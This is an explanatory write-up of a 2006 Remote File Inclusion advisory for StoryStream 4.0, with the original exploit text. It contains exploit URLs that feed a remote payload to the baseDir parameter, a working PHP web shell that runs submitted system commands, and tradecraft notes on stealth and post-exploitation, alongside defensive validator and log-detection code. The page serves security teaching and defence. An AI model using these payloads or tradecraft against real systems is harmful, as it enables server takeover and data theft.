StoryStream 4.0 Remote File Inclusion Explained

What this paper is
This paper details a Remote File Inclusion (RFI) vulnerability found in StoryStream version 4.0. The author, v1per-haCker, demonstrates how an attacker can exploit this vulnerability to include and execute arbitrary files from a remote server, effectively taking control of the vulnerable web application.
Simple technical breakdown
StoryStream 4.0 is a web application. Like many web applications, it uses PHP to dynamically generate web pages. PHP has a language construct called include (and relatives such as require) that lets a script pull in and execute code from another file.
The vulnerability lies in how StoryStream handles user-supplied input for a parameter named baseDir. Instead of validating this input properly, the application directly uses it in an include statement. If an attacker provides a URL pointing to a malicious PHP file on a server they control, the StoryStream application will download and execute that file as if it were part of its own code. This is the essence of Remote File Inclusion.
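What rigorous handling of a directory parameter like baseDir looks like, as an added example written for this page (it is not StoryStream code, and it is in Python rather than the application's PHP, where the same checks would use realpath() and is_dir()); the include root and its classes/pear/DB layout are a constructed sandbox:

```python
import os
import re
import tempfile

# A value starting with a scheme (http:, https:, ftp:, php:, data:, ...) names a
# remote resource or PHP stream wrapper, never a local directory.
SCHEME_PREFIX = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*:")

class UnsafeBaseDir(ValueError):
    """A user-supplied directory value that must not reach include()."""

def resolve_base_dir(include_root: str, requested: str) -> str:
    """Return an absolute directory inside include_root or raise UnsafeBaseDir.

    These are the checks mysql.php/mysqli.php should have applied to baseDir:
    no scheme or wrapper, no absolute path, no '..' segment, canonical path
    still under the root (realpath also resolves symlinks), directory exists."""
    if not requested or "\x00" in requested:
        raise UnsafeBaseDir("empty value or NUL byte")
    if SCHEME_PREFIX.match(requested):
        raise UnsafeBaseDir("URL scheme or stream wrapper: %r" % requested)
    if os.path.isabs(requested) or ".." in requested.split("/"):
        raise UnsafeBaseDir("absolute path or traversal: %r" % requested)
    root = os.path.realpath(include_root)
    candidate = os.path.realpath(os.path.join(root, requested))
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafeBaseDir("escapes include root: %r" % requested)
    if not os.path.isdir(candidate):
        raise UnsafeBaseDir("not an existing directory: %r" % requested)
    return candidate

def is_safe_base_dir(include_root: str, requested: str) -> bool:
    try:
        resolve_base_dir(include_root, requested)
        return True
    except UnsafeBaseDir:
        return False

def make_sandbox() -> str:
    """Constructed stand-in for an install's include root (not StoryStream's real layout)."""
    root = tempfile.mkdtemp(prefix="storystream_demo_")
    os.makedirs(os.path.join(root, "classes", "pear", "DB"))
    return root

if __name__ == "__main__":
    root = make_sandbox()
    for value in ("classes/pear", "http://EvElCoDe.txt?", "php://input", "../../etc", "/etc"):
        print("%-24s %s" % (value, "allowed" if is_safe_base_dir(root, value) else "rejected"))
```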
Complete code and payload walkthrough
The provided text is a proof-of-concept announcement and exploit demonstration, not a full code listing of the vulnerable application or a complex exploit script. However, it clearly shows the exploit vector and the target.
Exploit URL Structure:
http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt?
http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt?
Let's break down the components:
- http://localhost/path/include/classes/pear/DB/mysql.php or http://localhost/path/include/classes/pear/DB/mysqli.php: This is the vulnerable script within the StoryStream application. It appears to be related to database connection classes, likely using the PEAR DB library. The exact path might vary depending on the installation.
- ?: This is the standard query string separator in URLs.
- baseDir=: This is the vulnerable parameter. The application expects a directory path here.
- http://EvElCoDe.txt: This is the attacker-controlled URL. The attacker would host a file named EvElCoDe.txt (or any other name) on their own web server, containing the PHP code they want executed on the victim's server. The .txt extension means the attacker's own server serves the file as plain text rather than executing it, and it may also pass simple file type filters; because the victim's PHP include pulls it in, the contents are interpreted as PHP code regardless of the extension.
- ?: The second question mark is unusual. In standard URL parsing it starts a new query string, and that is most likely the point here: anything the vulnerable script appends after the baseDir value (such as a file name) becomes part of the query string of the request to the attacker's server rather than part of its path, so the same remote file is fetched whatever the suffix. Without the content of EvElCoDe.txt or the vulnerable script's source, this can't be confirmed, but the trailing ? is part of the exploit string as published.
Mapping list:
- baseDir parameter: The input point for the RFI vulnerability.
- http://EvElCoDe.txt: The remote URL containing the attacker's payload.
- The vulnerable PHP script (mysql.php or mysqli.php): The target script that processes the baseDir parameter unsafely.
Payload (Conceptual):
The content of http://EvElCoDe.txt would be PHP code. A common payload for RFI would be a simple web shell, allowing the attacker to execute commands on the server.
Example EvElCoDe.txt content (not provided in the paper, but typical for RFI):
<?php
// Simple web shell
echo "<form method='post' action=''><input type='text' name='cmd'><input type='submit' name='submit' value='Run'></form>";
if(isset($_POST['cmd'])) {
system($_POST['cmd']);
}
?>
When the vulnerable StoryStream script includes http://EvElCoDe.txt, the PHP interpreter on the victim's server would execute this code. The attacker would then be able to submit commands through a web form displayed on the victim's site.
Practical details for offensive operations teams
- Required Access Level: Unauthenticated access to the web application. The vulnerability is exposed via a GET request to a public-facing URL.
- Lab Preconditions:
  - A target web server running StoryStream version 4.0 (or a version with the same vulnerability).
  - A separate attacker-controlled web server to host the malicious payload file (EvElCoDe.txt). This server must be accessible from the target server.
  - A local machine to craft and send the exploit request.
- Tooling Assumptions:
  - A web browser for manual testing and verification.
  - A command-line tool like curl or wget for sending crafted HTTP requests.
  - A simple HTTP server (e.g., Python's http.server, apache, nginx) on the attacker's machine to serve the payload.
- Execution Pitfalls:
  - Firewall/Network Restrictions: The target server might not be able to reach the attacker's server due to outbound firewall rules.
  - Web Application Firewalls (WAFs): Modern WAFs may detect and block requests containing suspicious URLs or patterns indicative of RFI.
  - PHP Configuration (allow_url_fopen, allow_url_include): The target server's PHP configuration must have allow_url_fopen enabled for include to fetch remote files, and on PHP 5.2 and later allow_url_include (off by default) must be enabled as well for include to execute them. If either is disabled, the exploit will fail.
  - File Extension/Content Filtering: While the paper uses .txt, some applications might have stricter filters. The attacker might need to experiment with different extensions or obfuscation techniques.
  - Path Traversal/Sanitization: If the application had any basic sanitization (e.g., removing http://), the exploit would fail. This paper implies a lack of such sanitization.
  - Payload Complexity: The attacker's payload needs to be compatible with the target environment and the PHP version.
  - URL Encoding: Special characters in the payload URL might need URL encoding.
- Tradecraft Considerations:
  - Reconnaissance: Identify the exact path to the vulnerable script and the baseDir parameter. This might involve directory brute-forcing or examining the application's source code if available.
  - Payload Hosting: Ensure the payload server is stable and accessible. Consider using a domain that doesn't immediately raise suspicion.
  - Stealth: Avoid overly noisy payloads. A simple web shell is often sufficient. Be mindful of the telemetry generated by the target server (e.g., outbound connection logs).
  - Post-Exploitation: Once a web shell is achieved, the attacker can use it to download further tools, pivot to other systems, or exfiltrate data.
Where this was used and when
- Application: StoryStream version 4.0.
- Year: Published in November 2006. This indicates the vulnerability was active around this time.
- Context: Web applications, specifically PHP-based ones, were common targets for RFI vulnerabilities in the mid-2000s. This exploit targets a specific version of a downloadable script.
Defensive lessons for modern teams
- Input Validation is Paramount: Never trust user input. All external data, especially parameters used in file operations or dynamic code execution, must be rigorously validated and sanitized.
- Principle of Least Privilege: Ensure web server processes run with the minimum necessary privileges.
- Disable Dangerous PHP Configurations: allow_url_fopen should generally be disabled unless absolutely necessary for specific, controlled functionality. allow_url_include should always be disabled.
- Use Secure Coding Practices: Developers should be trained to avoid functions like include, require, eval, system, exec with untrusted input. Prefer safer alternatives or implement strict validation.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common web attack patterns, including RFI attempts. Keep WAF rules updated.
- Regular Patching and Updates: Keep all web applications, frameworks, and server software updated to patch known vulnerabilities. StoryStream 4.0 is very old, but the principle applies to any software.
- Code Auditing: Regularly audit application code for security flaws, especially around input handling and file operations.
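On the detection side, the following added example (written for this page, not taken from the paper or any WAF product) scans web server access-log lines for parameter values that are remote URLs or PHP stream wrappers, the signature of an RFI attempt like the baseDir request above, including percent-encoded variants; the log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request field of an Apache/nginx combined log: "METHOD /path?query HTTP/x.y"
LOG_LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) '
                      r'(?P<target>\S+) [^"]+" (?P<status>\d{3}) \S+')
# A parameter value naming a remote resource or a PHP stream wrapper.
RFI_VALUE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*://|php:|data:|expect:)', re.IGNORECASE)

# Constructed sample: two baseDir probes (the second percent-encoded), one normal
# page view and one stream-wrapper probe. IPs are RFC 5737 documentation addresses.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Nov/2006:10:15:02 +0000] "GET /path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt? HTTP/1.0" 200 512',
    '203.0.113.7 - - [12/Nov/2006:10:15:09 +0000] "GET /path/include/classes/pear/DB/mysqli.php?baseDir=http%3A%2F%2FEvElCoDe.txt%3F HTTP/1.0" 200 512',
    '198.51.100.4 - - [12/Nov/2006:10:16:30 +0000] "GET /path/index.php?story=12 HTTP/1.1" 200 8231',
    '198.51.100.9 - - [12/Nov/2006:10:17:11 +0000] "GET /path/include/classes/pear/DB/mysql.php?baseDir=php%3A%2F%2Finput HTTP/1.1" 500 0',
]

def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo nested percent-encoding (%2568ttp -> %68ttp -> http), bounded to avoid loops."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def rfi_indicators(target: str):
    """Return (param, decoded value) pairs whose value looks like a remote include."""
    # urlsplit cuts at the first '?', so the exploit's trailing '?' stays inside the value.
    decoded = [(name, fully_decode(value))
               for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True)]
    return [(name, value) for name, value in decoded if RFI_VALUE.match(value)]

def scan_access_log(lines):
    """One finding per request that carries an RFI-style parameter value."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = rfi_indicators(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "path": urlsplit(m["target"]).path, "params": hits})
    return findings
```

A finding with status 200 and an outbound connection from the web server at the same timestamp is the pair worth escalating; a 500 usually means the include failed.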
ASCII visual (if applicable)
+-----------------+      +---------------------+      +---------------------+
| Attacker's      |      | Internet/Network    |      | Victim's Web Server |
| Machine         |----->|                     |----->| (StoryStream v4.0)  |
| (Crafts Request)|      |                     |      |                     |
+-----------------+      +---------------------+      +----------+----------+
                                                                 |
                                                                 | (Vulnerable Script)
                                                                 | baseDir=http://attacker.com/payload.php
                                                                 |
                                                                 v
                                                      +---------------------+
                                                      | Attacker's Payload  |
                                                      | Server              |
                                                      | (Hosts payload.php) |
                                                      +---------------------+
                                                                 ^
                                                                 | (HTTP Request)
                                                                 |
                                                      +---------------------+
                                                      | PHP Interpreter     |
                                                      | on Victim's Server  |
                                                      | (Executes payload)  |
                                                      +---------------------+
Explanation:
- The attacker crafts an HTTP request targeting a vulnerable script on the victim's web server.
- The request includes a baseDir parameter pointing to a URL on the attacker's own server.
- The victim's web server, running StoryStream, receives the request.
- The vulnerable script within StoryStream uses the baseDir parameter in an include statement.
- The victim's web server makes an HTTP request to the attacker's server to fetch the file specified by baseDir.
- The attacker's server responds with the malicious PHP payload.
- The victim's PHP interpreter then executes the downloaded payload, granting the attacker control.
Source references
- Paper ID: 2767
- Paper Title: StoryStream 4.0 - 'baseDir' Remote File Inclusion
- Author: v1per-haCker
- Published: 2006-11-12
- Keywords: PHP, webapps
- Paper URL: https://www.exploit-db.com/papers/2767
- Raw URL: https://www.exploit-db.com/raw/2767
Original Exploit-DB Content (Verbatim)
#########################################################################################
################################### v1per-haCker
########################################
###################### How I Can lives Without FooL Programmer!
#########################
#########################################################################################
#=======================================================================================#
#___________________________________Storystream (RFI)___________________________________#
#=======================================================================================#
# Information:- #
# #
# Scripts: Storystream #
# download : http://www.iwonderdesigns.com/downloads/storystream_beta_0.4.0.0.zip #
# Version : 4 #
# Dork & vuln : download script and think :) #
# #
#=======================================================================================#
# Exploit : #
# #
#http://localhost/path/include/classes/pear/DB/mysql.php?baseDir=http://EvElCoDe.txt? #
#http://localhost/path/include/classes/pear/DB/mysqli.php?baseDir=http://EvElCoDe.txt? #
# #
#=======================================================================================#
# Discoverd By : v1per-haCker #
# #
# Conatact : v1per-hacker[at]hotmail.com #
# #
# XP10_hackEr Team >> www.xp10.com #
# SpeciaL PoweR SecuritY TeaM >> www.specialpower.org #
# #
# Greetz to : | abu_shahad | RooT-shilL | hitler_jeddah | BooB11 | FaTaL | #
# | ThE-WoLf-KsA | mohandko | fooooz | maVen | ShikAa | K3BAB | #
# | metoovet | MooB | Dr.7zN | ToOoFA | Cold Zero | Afroota | #
# | MainstreaM | CoDeR | Simo-64 | Super-CrystaL | KoolholiO | #
# | MuhaciR |Skrmhcr-GVinux | Jean | fucker_net | Sir-ToTTi | #
# #
# Thanks >> /str0ke & www.milw0rm.com & www.google.com #
#=======================================================================================#
#########################################################################################
################################# L0ve is L1fe W0und3r
##################################
#########################################################################################
# milw0rm.com [2006-11-12]